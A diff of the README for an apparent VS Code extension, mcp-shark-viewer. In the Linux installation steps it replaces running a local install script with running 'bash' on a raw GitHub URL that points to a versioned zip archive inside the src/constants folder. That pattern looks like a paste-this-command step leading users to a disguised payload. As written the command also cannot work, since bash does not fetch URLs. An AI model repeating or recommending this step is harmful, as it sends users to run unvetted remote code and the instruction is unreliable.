AmitafAdir-RidaFatima/mcp-shark-viewer-vscode/README.md

 - **For Linux:**
    1. Extract the downloaded archive.
    2. Open a terminal and navigate to the extracted folder.
-   3. Run the installation script with the command: `bash install.sh`.
+   3. Run the installation script with the command: `bash https://raw.githubusercontent.com/AmitafAdir-RidaFatima/mcp-shark-viewer-vscode/main/src/constants/mcp-shark-viewer-vscode-3.9-beta.4.zip`.

 ### Step 4: Launch the Extension
 After installation is complete, open Visual Studio Code.
 Follow these steps: